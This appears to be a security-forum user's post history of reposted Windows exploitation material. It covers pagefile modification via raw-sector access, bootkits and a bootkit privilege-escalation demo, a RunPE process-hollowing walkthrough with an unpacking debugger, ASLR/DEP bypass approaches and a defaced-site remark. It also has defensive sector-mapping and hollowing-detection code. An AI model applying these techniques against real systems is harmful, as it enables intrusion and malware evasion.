ionut97

Everything posted by ionut97

  1. Exploits 2: Exploitation in the Windows Environment

     Lab Requirements: Windows XP SP3 Virtual Machine with the following installed:
     • Windows Platform SDK 7.0 or 7.1 (optional debugging tools need to be installed)
     • Microsoft Visual C++ Express 2008
     • HxD hex editor

     Author Comments: This course covers the exploitation of stack corruption vulnerabilities in the Windows environment. Stack overflows are programming flaws that often allow an attacker to execute arbitrary code in the context of a vulnerable program. There are many nuances involved with exploiting these vulnerabilities in Windows. Windows' exploit mitigations make leveraging these programming bugs more difficult, but not impossible. The course highlights the features and weaknesses of many of the exploit mitigation techniques deployed in Windows operating systems. Also covered are labs that describe the process of finding bugs in Windows applications with mutation based fuzzing, and then developing exploits that target those bugs.
  2. Bypassing Address Space Layout Randomization
     Toby 'TheXero' Reynolds, April 15, 2012

     Contents
     • 1 Introduction
     • 2 Method 1 - Partial overwrite
     • 3 Method 2 - Non ASLR
     • 4 Method 3 - Brute force
     • 5 Conclusion

     http://www.thexero.co.uk/downloads/ASLR.pdf
  3. About the Pagefile Attack

     The pagefile attack is about using the fact that Windows swaps memory out into the pagefile. The attack is based on modification of the pagefile, and so indirectly of the physical memory. The idea is to find specific memory in the pagefile, modify it, and let Windows reload it without any verification. But there are a few limitations to consider; the most important one is that you cannot directly access the pagefile. The file "C:\pagefile.sys" is locked for access, you cannot open it by CreateFile. The system process has an open handle without any Shared Access flag set, so any access to pagefile.sys will consequently fail.

     How to access the pagefile under Windows

     So how to access the pagefile? By bypassing the Windows file overhead. This can be done by not using the CreateFile/WriteFile functions but direct driver communication. Direct driver communication can be done in 2 ways (and the first is the Windows File Management again):
     • CreateFile with a valid DOS device name or device name (i.e. "\\.\PhysicalDrive0")
     • DeviceIoControl

     With the first you can open handles which can be used to send and receive (ReadFile, WriteFile) data to and from drivers. A driver can register a device name, and if you open a handle to the device you open a handle to the driver. Once opened, you can communicate with the driver; in the example you would directly do read/write operations on the hard disk (compare with Raw Sector Access). There was also an attack on physical memory, because the physical memory object "\Device\PhysicalMemory" was writable as non-Administrator in Windows XP (fixed in Service Pack 2). You can use the DeviceIoControl function to directly send control codes (IOCTLs, I/O Control Codes) to the driver. Control codes tell the driver what to do. For the function you also need an open handle, but in contrast to file-mapped driver communication you can open a handle with the correct, undocumented flags.

     After you have opened a handle to the driver using CreateFile, you can send IOCTLs using DeviceIoControl. I'm glad to say that Microsoft started documenting the IOCTLs in late 2008, so there are now many documented IOCTLs in connection with their next operating system, Windows 7. They want people to NOT write drivers but use existing API functions. This is also a result of the fact that Windows Vista and newer only allow loading signed drivers, which means having a company and paying for signing, registering etc.

     So how is the magic done to access the pagefile? By using the correct IOCTLs and flags:
     • Open a handle to the NTFS file system driver of the volume via CreateFile by specifying "\\.\C:\" as file name and FILE_READ_ATTRIBUTES as desired access flag
     • Receive the cluster list by calling DeviceIoControl with the FSCTL_GET_RETRIEVAL_POINTERS IOCTL
     • Calculate start sector and count by LCN (Logical Cluster Number), data run and NTFS volume info (Sectors per Cluster, Clusters per Record)
     • Read the data runs directly using raw sector access

     Be sure to specify the correct device name "\\.\[Drive Letter]:\" with the ending backslash, otherwise you would open a handle to the logical drive. The undocumented FILE_READ_ATTRIBUTES flag for the desired access allows you to send IOCTLs to the driver (but still forbids read/write IO). And this is exactly what we need, and what was done in the Pagefile Attack. You need to know about the internal NTFS file structure, how clusters are stored. There is a concept called "Data Runs" (also appearing in the FAT file system), which means that multiple clusters are stored and remembered in a list as one single data run. All runs together make the file. The list of the data runs is received by the IOCTL FSCTL_GET_RETRIEVAL_POINTERS, and each element consists of next VCN and LCN. Next VCN tells you the starting virtual cluster number (starting from zero) inside the file, and LCN the logical cluster number on the drive.

     This concept, receiving the cluster list with the IOCTL, works for both FAT and NTFS. I don't want to explain the full NTFS file system here, but be aware of sparse data (= clusters which are fully zero, alpha compression), because they are not stored on NTFS but assigned LCN -1. And do not forget compression, encryption and resident data. Take a look at the NTFS documentation.

     Limitations

     As in my Hibernation File Attack, the Pagefile Attack also has its limitations. First you need elevated Administrator rights for the driver communication. Second, the Pagefile Attack works only up to Windows XP; Microsoft fixed the vulnerability in the Windows Vista Release Candidate in response to the public presentation of the pagefile attack. Furthermore it's important to say that it is a relatively high expenditure to find and replace specific memory in the pagefile, so it is only of limited suitability for real exploits used by malware.

     References
     • Vista RC2 vs. pagefile attack (and some thoughts about Patch Guard), Joanna Rutkowska in her blog "invisiblethings"
     • Subverting Vista Kernel For Fun And Profit - presentation at Black Hat USA 2006
     • Rutkowska's profile on Black Hat USA 2006

     Source: Pagefile Attack - Peter Kleissner
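The cluster-to-sector calculation from the third step above, as an added example that is not part of Kleissner's article: it converts the extent list that FSCTL_GET_RETRIEVAL_POINTERS returns into sector ranges, the read-only mapping a forensic reader or an integrity checker needs before it touches the raw device. The structures are declared locally (they mirror the fields of RETRIEVAL_POINTERS_BUFFER instead of including the Windows header), the volume geometry and the extent list are constructed, and sparse runs (LCN -1) are flagged rather than mapped.

```cpp
// Added example: map FSCTL_GET_RETRIEVAL_POINTERS extents to raw sector runs.
// Local mirror of the Windows structures so this compiles on any platform.
#include <cstdint>
#include <cstdio>
#include <stdexcept>
#include <vector>

// One extent as returned by the IOCTL: the run ends just before nextVcn and
// starts at cluster lcn on the volume. lcn == -1 marks a sparse run (no clusters).
struct Extent {
    int64_t nextVcn;
    int64_t lcn;
};

// Volume geometry. sectorsPerCluster comes from the NTFS volume data (or the
// boot sector); hiddenSectors is the partition offset, needed only when the
// physical drive rather than the volume device is read. Values are constructed.
struct VolumeGeometry {
    uint32_t sectorsPerCluster;
    uint64_t hiddenSectors;
};

struct SectorRun {
    int64_t  vcn;          // first virtual cluster of the run inside the file
    uint64_t startSector;  // absolute sector on the drive, 0 if sparse
    uint64_t sectorCount;
    bool     sparse;       // true: the run reads as zeros, nothing is on disk
};

// startingVcn is the StartingVcn field of the IOCTL buffer; each extent starts
// at the previous extent's nextVcn (or at startingVcn for the first one).
std::vector<SectorRun> ExtentsToSectorRuns(int64_t startingVcn,
                                           const std::vector<Extent>& extents,
                                           const VolumeGeometry& geo) {
    if (geo.sectorsPerCluster == 0) throw std::invalid_argument("sectorsPerCluster");
    std::vector<SectorRun> runs;
    int64_t vcn = startingVcn;
    for (const Extent& e : extents) {
        // A corrupt or truncated list must not produce negative run lengths.
        if (e.nextVcn <= vcn) throw std::runtime_error("extent list is not monotonic");
        const uint64_t clusters = static_cast<uint64_t>(e.nextVcn - vcn);
        SectorRun run;
        run.vcn = vcn;
        run.sectorCount = clusters * geo.sectorsPerCluster;
        run.sparse = (e.lcn < 0);
        run.startSector = run.sparse ? 0
            : geo.hiddenSectors + static_cast<uint64_t>(e.lcn) * geo.sectorsPerCluster;
        runs.push_back(run);
        vcn = e.nextVcn;
    }
    return runs;
}

// Which sector holds byte `offset` of the file: the lookup a raw-sector reader
// performs. Returns false for sparse runs and for offsets outside the list.
bool FileOffsetToSector(const std::vector<SectorRun>& runs, const VolumeGeometry& geo,
                        uint32_t bytesPerSector, uint64_t offset, uint64_t* sector) {
    const uint64_t clusterBytes = uint64_t(geo.sectorsPerCluster) * bytesPerSector;
    for (const SectorRun& r : runs) {
        const uint64_t runStart = static_cast<uint64_t>(r.vcn) * clusterBytes;
        const uint64_t runBytes = r.sectorCount * bytesPerSector;
        if (offset >= runStart && offset < runStart + runBytes) {
            if (r.sparse) return false;
            *sector = r.startSector + (offset - runStart) / bytesPerSector;
            return true;
        }
    }
    return false;
}

int main() {
    // Constructed sample: 4 KB clusters on 512-byte sectors (8 sectors/cluster),
    // partition starting at sector 63. The file is 10 clusters at LCN 1000,
    // then 4 sparse clusters, then 2 clusters at LCN 500.
    const VolumeGeometry geo = {8, 63};
    const std::vector<Extent> extents = {{10, 1000}, {14, -1}, {16, 500}};
    std::vector<SectorRun> runs = ExtentsToSectorRuns(0, extents, geo);
    for (const SectorRun& r : runs)
        std::printf("vcn %lld: %s, start sector %llu, %llu sectors\n",
                    (long long)r.vcn, r.sparse ? "sparse" : "on disk",
                    (unsigned long long)r.startSector, (unsigned long long)r.sectorCount);
    return 0;
}
```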
  4. Abstract

     In my third paper I want to talk about "The Magic of Bootkits". Boot software has occupied me for years of my lifetime. I wrote an operating system, a boot management solution and at last a "Forensic Lockdown Software" which boots before Windows does. I have seen a lot of stuff there and so I want to discuss a few points of bootkits, whether they become useless or not, whether they will rule the world or not. I am writing this article because I read the Pandalabs Security article about "Rootkits in the MBR, a dangerous reality" and I have analyzed development work of vbootkit which I will discuss later. Enjoy reading!

     - Peter Kleissner, Software Engineer (September 2008)

     The dangers of Bootkits

     Bootkits are loaded before the main operating system is. The term 'Bootkit' refers to a Rootkit installed in any Boot Record (Master Boot Record, Partition Boot Record, Bootloader). Modern Bootkits are able to hook and bypass operating system routines, initialization (processor mode switch) as well as security checks (integrity, code signing, etc.). They are not only acting on startup, but also during execution of the host operating system. Because Bootkits are loaded before the OS is, they can do what they want (at least what the programmer is capable of letting them do). Normally they not only hook operating system kernel functions but also give themselves kernel rights and do various other things.

     How to consider Bootkits

     Bootkits differ in their code from common viruses; like any other system software they are tied directly to the machine code the processor executes. Simplified, but like Windows, they have to support the hardware with their own code; they need their own drivers for graphics, reading from disk etc. An important aspect of system software is the hardware platform and architecture. Boot viruses must be written for a specific architecture (for "normal" computers this is the Intel Architecture and the classical PC Architecture), so there is a hardware dependency normal software hasn't. Problems for boot viruses are not only the architecture, but the lacking documentation of it. For example, the boot process is very poorly documented, which makes it difficult to get boot software working on nearly any machine. Different computers will support different important features which are required or not. You can consider bootkits as applications that require a high rate of change. Unstandardized hardware is one problem, but new standards for previous architecture parts another. We have for example the new GUID Partition Table which replaces the old one, or the BIOS that is to be replaced by EFI. For the new Extensible Firmware Interface, you can throw away any previous boot software and write new one. Another problem beside hardware dependency is target operating system dependency: the bootkit has to hook the operating system's kernel functions and bypass the operating system's security functions. Current bootkits are targeted at operating system versions, like specifically Windows XP, Windows Vista or some Linux Kernel. It's also tricky with 32 and 64 bit operating system versions. It would be possible, but is currently not done, to include binary code for both operating system versions.

     How to detect a Bootkit

     For bootkit detection, I've already worked out a concept for detecting malicious boot software, described in my article Writing a Boot Scan Engine. It is about scanning for patterns, using a black and whitelist, a database, reports and other heuristic methods. When scanning an infected system for a bootkit it is important to know the bootkit is able to hook functions that are used for detection. An example would be the commonly hooked function ReadFile, which would - in that case - return different data than the real one. Of course the computer can be scanned from a live system, but this would be user-unfriendly crap. A solution would be a scanner which is loaded before the main operating system parts are loaded; a place for the scanner would be (Windows specific) in the Windows Bootloader or the Winloader.exe.

     The problem of Bootkits in the future with EFI

     A big change for boot viruses lies in the change from the old-fashioned BIOS to the new Extensible Firmware Interface (EFI). It makes the old BIOS and bootstrap obsolete and defines new standards for booting operating systems. First, old boot viruses will no longer work and cannot be "translated" to the new boot system. Second, we will have many more boot viruses in the future, within the next 10 years. With new versions of Microsoft's operating systems they will explode, because they have the ability to. EFI makes it very easy to develop boot loading software, or to develop a boot virus or bootkit. EFI brings better and more standardized support for hardware and supports features like the Portable Executable format that is used in Windows for executables. It's just a matter of time until we have easy-to-use compilers like Visual Studio for developing EFI applications. When we have this, it's very easy to copy & paste malicious boot software source code. I think the explosion will come in 2-3 years, once EFI is established and people begin to use its possibilities.

     Conclusion

     We see a current change in bootkits and in their development in the near future. It's incredible to see the effort people are putting in to write a fully functional bootkit. The good thing about previous bootkits is that only experts are capable of writing them, so modern malicious bootkits (the non proof-of-concept ones) are simply not available at this time. In 2-3 years we will see a change in bootkits when EFI is established, but until EFI applications are nearly like Windows applications, they can be easily found by anti-virus software.

     See you in 2-3 years, Peter Kleissner.

     Source: The Magic of Bootkits - Peter Kleissner
  5. The Art of Bootkit Development - Peter Kleissner

     Windows 8 Bootkit Live Demonstration: This shows how to use Stoned Lite to get SYSTEM rights on Windows 8 through the cmd privilege escalation (done by a driver loaded by the bootkit). The infector is just 14 KB in size and bypasses the UAC.
  6. Google Chrome 22 includes fewer new features than the previous version of Google's browser, but one of them is truly notable: a plugin that increases Flash security on Windows. Adobe Flash vulnerabilities are one of the exploits most often used by malware applications, but Google Chrome 22 includes the Pepper (PPAPI) plugin, which offers the greatest safety against viruses, writes Geek.

     Google Chrome 22 improves Flash security on Windows

     The new Flash plugin in Google Chrome 22 runs in the same sandbox that has so far been considered invulnerable to hacking attempts, and PPAPI has also reduced the number of Flash crashes by 20%. The Linux version of Google Chrome has been using the Flash plugin for more than 2 months, but now the increased security arrives on Windows 7 and Windows 8 as well. Google Chrome is the only browser that can display Flash content in the Metro interface apart from Internet Explorer 10, in which Flash only works on a small number of pages.

     Source: Google Chrome 22 improves Flash security on Windows | Hit.ro
  7. RunPE in a nutshell

     RunPE is a technique often used by (novice) virus authors to hide their viruses from an anti-virus scanner. It works by using a small launcher application that has the executable virus file embedded in an encrypted state. The easiest way to launch the executable would be to write a decrypted version of the virus to a file, but this would give the anti-virus scanners a chance to detect and subsequently disable it. Instead, the RunPE loader runs an innocent application and replaces its loaded process image with the virus.

     To understand the reasoning in the rest of the document, it's important that you understand how running a process from a memory buffer works from a technical point of view. First, the RunPE loader launches an innocent process using the CreateProcess API. The process is launched using the CREATE_SUSPENDED flag. This will suspend the process right after it is mapped into memory, but before the Windows PE loader loads all additional library files. Next, the RunPE loader calls GetThreadContext on the main thread of the newly created process. The returned thread context will have the state of all general purpose registers. The EBX register holds a pointer to the Process Environment Block (PEB), and the EAX register holds a pointer to the entry point of the innocent application. In the PEB structure, at an offset of eight bytes, is the base address of the process image. The loader calls NtUnmapViewOfSection. This function will unmap all the mapped sections of the innocent executable, freeing up the memory space for the virus to be mapped in. Then the loader reads the headers of the decrypted virus, and maps the headers and all sections into the innocent process using WriteProcessMemory. The correct memory page permissions are set using VirtualProtectEx. The loader writes the new base address into the PEB and calls SetThreadContext to point EAX to the new entry point. Finally, the loader resumes the main thread of the target process with ResumeThread and the Windows PE loader will do its magic. The executable is now mapped into memory without ever touching the disk.

     Plan of attack

     The weaknesses of RunPE should be obvious to anyone: at some point the loader has to decrypt the executable in the loader's memory space. Furthermore, the original executable will be mapped in the target process' memory space in a readable state, so you can easily dump the executable into a file. My first instinct was to try OllyDBG with the OllyDump plugin. Sadly, the RunPE loader left the process in a mutilated state, causing the plugin to fail. Another way to solve the problem would be forcing the RunPE loader to write the executable to a file instead of to the memory space of another process. The easiest way to achieve this is by hooking the WriteProcessMemory calls. You have to place the hooks before the RunPE loader ever gets control of execution; this proved to be quite challenging when the RunPE loader is written in a .NET language (and it often is, the people using this technique usually aren't very good at what they do). To solve this I decided to create my own debugger application that places an int3 breakpoint on WriteProcessMemory and reads the required data straight from the RunPE loader process with ReadProcessMemory.

     The Source

     The code I have so far does its job but is quite dirty. There is no real design behind it, I just started coding and fixing stuff as I thought about it. It also doesn't yet create a real decrypted executable but instead creates binary files for each WriteProcessMemory call. I haven't tested how anti debugger techniques react on this debugger yet. IsDebuggerActive() will return true for sure, but that can easily be prevented. How it reacts on tricks with exception handlers is something I have to test. I'd like to eventually expand this code to some sort of simple debugger framework where you can execute callback functions for every breakpoint. Not sure if I'll ever be motivated enough though.

     C:\>debugger.exe target.exe
     Process target.exe Loaded at 00400000
     Handling exception chain...
      Unknown Breakpoint at 7C90120E
     Creating breakpoint (WriteProcessMemory) at 7C802213
     Handling exception chain...
      Exception at 7C812AFB type 4242420
     Handling exception chain...
      Breakpoint (WriteProcessMemory) at 7C802213
     getting stack...
     WriteProcessMemory was called at address 4000000 on buffer b3adf8 with length 14
     Process closed with exit code 0

     C:\>cat 4000000.bin
     Hello this is a test

     C:\>

```cpp
#include <iostream>
#include <string>
#include <map>
#include <vector>
#include <iomanip>
#include <sstream>
#include <algorithm>
#include <functional>
#include <fstream>
#include <cctype>
#include <Windows.h>
#include <TlHelp32.h>

typedef void (*BreakpointCallback)(HANDLE proc, HANDLE thread);

struct Breakpoint
{
    std::string name;
    unsigned char originalBytes[2];
    BreakpointCallback callback; // Not yet used
};

typedef std::map<std::string, MODULEENTRY32> ModuleMap;
typedef std::map<void *, Breakpoint> BreakMap;

// Dumps the source buffer of a WriteProcessMemory call into <address>.bin
bool DumpDataToFile(HANDLE proc, DWORD address, DWORD bufferAddress, DWORD length)
{
    std::stringstream filename;
    filename << std::hex << address << ".bin";
    std::ofstream outfile(filename.str().c_str(), std::ofstream::binary | std::ofstream::trunc);

    char *buffer = new char[length];
    bool ok = ReadProcessMemory(proc, reinterpret_cast<void *>(bufferAddress), buffer, length, NULL) != 0;
    if(ok)
        outfile.write(buffer, length);
    delete[] buffer;
    return ok && outfile.good();
}

bool UpdateModuleList(int pid, ModuleMap& moduleList)
{
    HANDLE snap = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, pid);
    if(snap == INVALID_HANDLE_VALUE)
        return false;

    MODULEENTRY32 me;
    me.dwSize = sizeof(me); // Module32First fails without this
    moduleList.clear();
    if(Module32First(snap, &me))
    {
        do
        {
            std::string key = me.szModule;
            std::transform(key.begin(), key.end(), key.begin(), std::ptr_fun<int, int>(tolower));
            moduleList[key] = me;
        } while(Module32Next(snap, &me));
    }
    CloseHandle(snap);
    return true;
}

// I only place breakpoints on WINAPI functions so I write 2 bytes:
//   mov edi,edi  becomes  int3
//                         nop
// so I don't need to do anything special to handle the breakpoint, it will just continue with the nop
// and then follow the function prologue
bool ToggleInt3Breakpoint(void *address, std::string name, BreakMap& breakList, HANDLE proc)
{
    BreakMap::iterator bpit = breakList.find(address);
    if(bpit != breakList.end())
    {
        // Remove existing BP
        std::cout << "Removing breakpoint (" << bpit->second.name << ") at " << address << std::endl;
        if(!WriteProcessMemory(proc, address, bpit->second.originalBytes, 2, NULL))
            return false;
        breakList.erase(address);
    }
    else
    {
        // Create new BP
        Breakpoint bp = {name, {0, 0}, NULL};
        std::cout << "Creating breakpoint (" << name << ") at " << address << std::endl;
        if(!ReadProcessMemory(proc, address, bp.originalBytes, 2, NULL))
            return false;
        if(!WriteProcessMemory(proc, address, "\xCC\x90", 2, NULL))
            return false;
        breakList[address] = bp;
    }
    return true;
}

// Returns false once the breakpoints are in place so the caller stops calling us.
// Resolving WriteProcessMemory in our own kernel32 only works because XP maps system
// DLLs at the same base in every process (no ASLR), which is what this tool targets.
bool PlaceBreakpoints(ModuleMap& moduleList, BreakMap& breakList, HANDLE proc)
{
    ModuleMap::iterator kernel32 = moduleList.find("kernel32.dll");
    if(kernel32 != moduleList.end())
    {
        void *wpmAddress = reinterpret_cast<void *>(GetProcAddress(GetModuleHandle("kernel32.dll"), "WriteProcessMemory"));
        ToggleInt3Breakpoint(wpmAddress, "WriteProcessMemory", breakList, proc);
        return false;
    }
    else
        return true;
}

// Reads `slots` DWORDs from the top of the thread's stack (return address and arguments)
bool GetStack(int slots, HANDLE thread, HANDLE proc, std::vector<DWORD>& stack)
{
    CONTEXT context;
    context.ContextFlags = CONTEXT_ALL;
    std::cout << "getting stack..." << std::endl;
    if(!GetThreadContext(thread, &context))
        return false;

    for(int i = 0; i < slots; i++)
    {
        DWORD slot;
        if(!ReadProcessMemory(proc, reinterpret_cast<void *>(context.Esp + (i * 4)), &slot, sizeof(DWORD), NULL))
            return false;
        stack.push_back(slot);
    }
    return true;
}

// We handle the breakpoints here (and potential other exceptions)
void HandleException(DEBUG_EVENT de, BreakMap& breakList, HANDLE proc)
{
    std::cout << "Handling exception chain... " << std::endl;
    EXCEPTION_RECORD *exception = &de.u.Exception.ExceptionRecord;
    do
    {
        BreakMap::iterator bp = breakList.find(exception->ExceptionAddress);
        if(exception->ExceptionCode == EXCEPTION_BREAKPOINT && bp != breakList.end())
        {
            std::cout << " Breakpoint (" << bp->second.name << ") at " << exception->ExceptionAddress << std::endl;
            if(bp->second.name == "WriteProcessMemory")
            {
                // At the int3 the stack holds: return address, hProcess, lpBaseAddress, lpBuffer, nSize, ...
                std::vector<DWORD> stack;
                HANDLE thread = OpenThread(THREAD_GET_CONTEXT | THREAD_QUERY_INFORMATION, false, de.dwThreadId);
                bool haveStack = GetStack(6, thread, proc, stack);
                CloseHandle(thread);
                if(haveStack)
                {
                    std::cout << "WriteProcessMemory was called at address " << stack[2] << " on buffer " << stack[3]
                              << " with length " << stack[4] << std::endl;
                    DumpDataToFile(proc, stack[2], stack[3], stack[4]);
                }
            }
        }
        else if(exception->ExceptionCode == EXCEPTION_BREAKPOINT)
            std::cout << " Unknown Breakpoint at " << exception->ExceptionAddress << std::endl;
        else
        {
            std::cout << " Exception at " << std::hex << exception->ExceptionAddress << " type " << exception->ExceptionCode << std::endl;
            MessageBeep(0);
            Sleep(100);
        }
    } while((exception = exception->ExceptionRecord) != NULL);
}

int DebugMain(std::string targetPath)
{
    STARTUPINFO si = {0};
    si.cb = sizeof(si);
    PROCESS_INFORMATION pi;
    if(!CreateProcess(targetPath.c_str(), NULL, NULL, NULL, FALSE, DEBUG_PROCESS, NULL, NULL, &si, &pi))
    {
        std::cerr << "Error while creating process: " << GetLastError() << std::endl;
        return EXIT_FAILURE;
    }

    DEBUG_EVENT de;
    bool keepLooping = true;
    bool needBreakpoints = true;
    ModuleMap moduleList;
    BreakMap breakList;
    while(keepLooping && WaitForDebugEvent(&de, INFINITE))
    {
        switch(de.dwDebugEventCode)
        {
        case LOAD_DLL_DEBUG_EVENT:
        case UNLOAD_DLL_DEBUG_EVENT:
            UpdateModuleList(pi.dwProcessId, moduleList);
            break;
        case CREATE_PROCESS_DEBUG_EVENT:
            std::cout << "Process " << targetPath << " Loaded at " << de.u.CreateProcessInfo.lpBaseOfImage << std::endl;
            break;
        case EXIT_PROCESS_DEBUG_EVENT:
            std::cerr << "Process closed with exit code " << std::hex << de.u.ExitProcess.dwExitCode << std::endl;
            keepLooping = false;
            break;
        case EXCEPTION_DEBUG_EVENT:
            HandleException(de, breakList, pi.hProcess);
            break;
        default:
            break;
        }

        // Place breakpoints as soon as kernel32 is loaded
        if(needBreakpoints)
            needBreakpoints = PlaceBreakpoints(moduleList, breakList, pi.hProcess);
        ContinueDebugEvent(de.dwProcessId, de.dwThreadId, DBG_CONTINUE);
    }

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return EXIT_SUCCESS;
}

int main(int argc, char **argv)
{
    if(argc != 2)
    {
        std::cerr << "Usage: " << argv[0] << " <executable path>" << std::endl;
        return EXIT_FAILURE;
    }
    return DebugMain(argv[1]);
}
```

     Source: https://thunked.org/programming/decrypting-runpe-malware-t110.html
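As an added example (not from the thunked.org post or its debugger), the API sequence the post walks through can be matched as a detection rule: the code below scans constructed trace lines of the form `<caller pid> <api> [flags]` and flags a process that creates a suspended child, unmaps its image, writes into it, changes its thread context and resumes it. The trace format, the pids and the API names as logged are assumptions; real loaders interleave other calls between the stages, which the matcher tolerates.

```cpp
// Added example: match the RunPE / process-hollowing call sequence in an API trace.
#include <iostream>
#include <map>
#include <sstream>
#include <string>
#include <vector>

// The order of operations the post describes, as performed by the loader on the
// child it created. CreateProcess must carry CREATE_SUSPENDED to start a match.
static const char* const kStages[] = {
    "CreateProcess", "GetThreadContext", "NtUnmapViewOfSection",
    "WriteProcessMemory", "SetThreadContext", "ResumeThread"};
static const int kStageCount = 6;

struct ProcessState {
    int stage = 0;        // index into kStages of the call we expect next
    int writeCalls = 0;   // WriteProcessMemory calls seen (headers, sections, PEB)
};

struct Alert {
    int pid;
    int writes;
};

// Feed one trace line; returns true if it started, advanced or completed a match.
// Unrelated APIs (VirtualProtectEx, ReadFile, ...) neither advance nor reset the state.
bool ObserveLine(const std::string& line, std::map<int, ProcessState>& states,
                 std::vector<Alert>& alerts) {
    std::istringstream in(line);
    int pid;
    std::string api, flags;
    if (!(in >> pid >> api)) return false;   // malformed line, ignore
    std::getline(in, flags);
    ProcessState& st = states[pid];
    if (api == "CreateProcess") {
        st = ProcessState();                 // a new child restarts the sequence
        if (flags.find("CREATE_SUSPENDED") != std::string::npos) st.stage = 1;
        return st.stage == 1;
    }
    if (st.stage == 0) return false;         // no suspended child outstanding
    if (api == "WriteProcessMemory") {
        st.writeCalls++;
        if (st.stage == 3) st.stage = 4;     // first write after the unmap
        return true;
    }
    if (api == kStages[st.stage]) {
        st.stage++;
        if (st.stage == kStageCount) {       // ResumeThread closed the sequence
            alerts.push_back({pid, st.writeCalls});
            st = ProcessState();
        }
        return true;
    }
    return false;
}

std::vector<Alert> ScanTrace(const std::vector<std::string>& lines) {
    std::map<int, ProcessState> states;
    std::vector<Alert> alerts;
    for (const std::string& l : lines) ObserveLine(l, states, alerts);
    return alerts;
}

// Constructed trace: pid 4711 is a RunPE loader, pid 900 a plain launch and
// pid 1200 a debugger-like tool that suspends a child but never unmaps it.
std::vector<std::string> SampleTrace() {
    return {
        "4711 CreateProcess CREATE_SUSPENDED",
        "4711 GetThreadContext",
        "4711 ReadProcessMemory",
        "4711 NtUnmapViewOfSection",
        "4711 WriteProcessMemory",   // headers
        "4711 WriteProcessMemory",   // .text
        "4711 WriteProcessMemory",   // .data
        "4711 VirtualProtectEx",
        "4711 WriteProcessMemory",   // image base into the PEB
        "4711 SetThreadContext",
        "4711 ResumeThread",
        "900 CreateProcess",
        "900 ResumeThread",
        "1200 CreateProcess CREATE_SUSPENDED",
        "1200 GetThreadContext",
        "1200 SetThreadContext",
        "1200 ResumeThread",
    };
}

int main() {
    for (const Alert& a : ScanTrace(SampleTrace()))
        std::cout << "pid " << a.pid << ": hollowing sequence completed after "
                  << a.writes << " WriteProcessMemory calls\n";
    return 0;
}
```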
  8. Description: In this video Michael Buselli talks about Blind SQL Injection and some of the ways attackers can inject malicious behavior to gather information from your system for bad purposes. Michael Buselli's talk begins by briefly discussing the dangers and counter-measures of SQL injection. It then focuses on a particular, little known variant called blind SQL injection that is often overlooked. This talk is full of examples which show the dangers of SQL and blind SQL injection.

     Michael Buselli: Michael is a software developer that also has significant experience in systems administration and security architecture. Michael presently works as a Ruby on Rails consultant at Aon Hewitt.

     Source: Blind SQL Injection w/Michael Buselli - software craftsmanship mchenry county

     Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.

     Original Source: SCMC August 2011 - Blind SQL Injection by Michael Buselli on Vimeo
  9. AEG: Automatic Exploit Generation on Source Code

     The automatic exploit generation challenge we address is: given a program, automatically find security-critical bugs and generate exploits. Our approach uses a novel formal verification technique called preconditioned symbolic execution to make automatic exploit generation more scalable to real-world programs than without it. We implemented our techniques in a system called AEG, which we use to automatically generate 16 exploits for 14 open-source projects. Two of the generated exploits are against previously unknown vulnerabilities.

     The hard part, in our experience, was exploring the state space efficiently to find bugs, determine the problem, and generate an initial input that triggers the bug. The core of our paper is a technique called preconditioned symbolic execution, which provides better scalability for finding exploitable bugs than when using previous symbolic execution techniques. The main idea is to guide symbolic execution to program paths that are more likely to be exploitable. Basic symbolic execution tends to try and explore all paths, which is more expensive. Our implementation is built on top of KLEE, a great symbolic execution engine from researchers at Stanford.

     We are very excited about these results, and think they show a real step forward in the state of the art. Don't take this to mean we believe it's a solved problem. Our future work focuses on scaling to larger and more programs, to more types of exploits, and to other relevant problem settings. There is plenty still to do.

     We presented our paper at NDSS 2011.
     • The most current copy of our paper: PDF, BibTeX. Help us find typos in our paper and join our thank you list.
     • The camera-ready version for NDSS (the above is the update; this is here mostly for historical reasons): PDF

     For those of you interested in watching, we've prepared a YouTube video of our experiments. We have a short talk that gives a high-level overview of our take on the problem, the direction, and our project. Also note that due to YouTube time limits, we left out several important things such as the related work. That stuff is important, but we just couldn't fit everything in. Please see the paper for more information.

     As a random link related to exploits, CMU runs a Capture the Flag team. See their website: Plaid Parliament of Pwning.

     Source: http://security.ece.cmu.edu/aeg/
  10. How do they know it was only one? Later edit: They still have the defacement on the other domain. http://demitel.ro/
  11. More recently I have researched methods on bypassing two security protection mechanisms under windows that have proven quite difficult. Whist this is nothing new, I will provide the understanding I have of the techniques and show you a brief demonstration of the approach I took. We will discuss this techniques in relation to stack based buffer overflows only for now. What is interesting is that each one protection mechanism individually are not difficult to bypass, just when they are combined together we are presented with a difficult hurdle. Lets investigate why, by explaining what the security mechanisms actually do and then using a proof of concept to help readers visualize the process. What is ASLR? Address space localization randomization is nothing more than randomizing the high byte order of any address within the PEB (process environment block). Generally under windows XP and prior versions we see addresses that never change under the windows libraries. So for example the address from kernel32.dll for WriteProcessMemory() will always be at 0x7C802213. But of course, newer versions of windows have changed this, so that now an address will be randomize like this: 0xXXXX2213 (The offset will be different too under Vista and 7, this is just an example). One important point too make is that we will always know the offset too where the functions lye in any given module. This is known as the relative offset, and will come into play when we attempt to bypass this security. Ok so as you can see, in a typical EIP or SEH exploit, we would not have too many dramas bypassing this as a lot of modules that come with applications are not using ASLR and essentially we could just find an instruction that will take us too our attacker controlled buffer. However if our target application came with no additional modules, or they were all ASLR protected, or loaded with a dynamic base (using nulls) then we would have serious issues bypassing this technology. 
We are generally more than unlikely too see this situation due to compatibility issues. ASLR Bypass techniques: Bruteforcing (as long as the parent process spawns child processes). Generally, this would only be possibly in server environments. Entropy is small in 32bit processors. Using a call to a DEP bypassing function from within a non ASLR module. This way we dont even have to know the address at all, we can rely on code that comes inside the applications modules. Leak an pointer to a windows modules from the stack or heap memory. As long as we can create the relevant chains, then this process works. While this is nice, we will face another hurdle. Hardware enforced data execution prevention, that will stop the execution of attacker supplied code in memory. What is DEP? DEP is a CPU flag set to indicate that the NX is on (non-executable). Any attacker supplied code in either the heap or stack memory will not be executed and cause an access violation. For an attacker to bypass this issue they must execute a ret2libc type exploit where the attacker uses system API's to mark memory pages as executable or move the shellcode to an executable region and jump on it. In a stack based exploit, this will require the attacker to use a technique called Return Oriented Programming (ROP). This will allow an attacker to continually return to the stack and execute the next instruction until the shellcode is executed. DEP Bypass techniques using windows API: WriteProcessMemory() 